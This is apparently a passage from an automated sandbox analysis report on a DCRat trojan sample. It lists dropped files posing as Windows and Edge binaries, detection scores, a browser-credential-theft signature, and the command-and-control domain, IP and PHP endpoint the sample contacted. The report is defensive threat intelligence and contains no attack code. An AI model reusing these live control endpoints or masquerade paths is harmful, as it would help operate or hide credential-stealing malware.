18->31         started        33 conhost.exe 18->33         started        35 chcp.com 1 18->35         started        45 C:\Program Files (x86)\...\msedge.exe, PE32 20->45 dropped 77 Infects executable files (exe, dll, sys, html) 20->77 37 conhost.exe 20->37         started        39 cvtres.exe 1 20->39         started        47 C:\Windows\...\SecurityHealthSystray.exe, PE32 24->47 dropped 41 conhost.exe 24->41         started        43 cvtres.exe 1 24->43         started        signatures9 process10 dnsIp11 67 373292cm.nyashka.top 80.211.144.156, 49709, 49712, 49714 ARUBA-ASNIT Italy 26->67 57 C:\Users\user\Desktop\oANPimHy.log, PE32 26->57 dropped 59 C:\Users\user\Desktop\ksQGNTNC.log, PE32 26->59 dropped 61 C:\Users\user\Desktop\dMjZyaMQ.log, PE32 26->61 dropped 63 2 other malicious files 26->63 dropped 89 Tries to harvest and steal browser information (history, passwords, etc) 26->89 file12 signatures13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              jW5TA1J9Z1.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              jW5TA1J9Z1.exe100%AviraHEUR/AGEN.1323342
                              jW5TA1J9Z1.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe100%AviraHEUR/AGEN.1323342
                              C:\Windows\AppReadiness\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\DVfmUYdt.log100%AviraTR/PSW.Agent.qngqt
                              C:\Windows\AppReadiness\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\oANPimHy.log100%AviraTR/PSW.Agent.qngqt
                              C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\umLWkwXM.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\dMjZyaMQ.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\bakRRaCx.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe100%Joe Sandbox ML
                              C:\Windows\AppReadiness\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\DVfmUYdt.log100%Joe Sandbox ML
                              C:\Windows\AppReadiness\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\oANPimHy.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\LzHTfErB.log100%Joe Sandbox ML
                              C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\DVfmUYdt.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\LzHTfErB.log8%ReversingLabs
                              C:\Users\user\Desktop\UiajPhxi.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\bakRRaCx.log8%ReversingLabs
                              C:\Users\user\Desktop\dMjZyaMQ.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\kDsGBTSe.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\ksQGNTNC.log17%ReversingLabs
                              C:\Users\user\Desktop\oANPimHy.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\umLWkwXM.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\vaQeWJTK.log17%ReversingLabs
                              C:\Windows\AppReadiness\RuntimeBroker.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\DiagTrack\RuntimeBroker.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              373292cm.nyashka.top
                              		80.211.144.156
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phptrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/chrome_newtabjW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                    		unknown
                                    https://duckduckgo.com/ac/?q=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icojW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                        		unknown
                                        http://373292cm.nyashka.topjW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchjW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                            		unknown
                                            http://373292cm.nyashka.top/jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://373292cm.nyPZjW5TA1J9Z1.exe, 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                80.211.144.156
                                                		373292cm.nyashka.topItaly
                                                		31034ARUBA-ASNITtrue

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
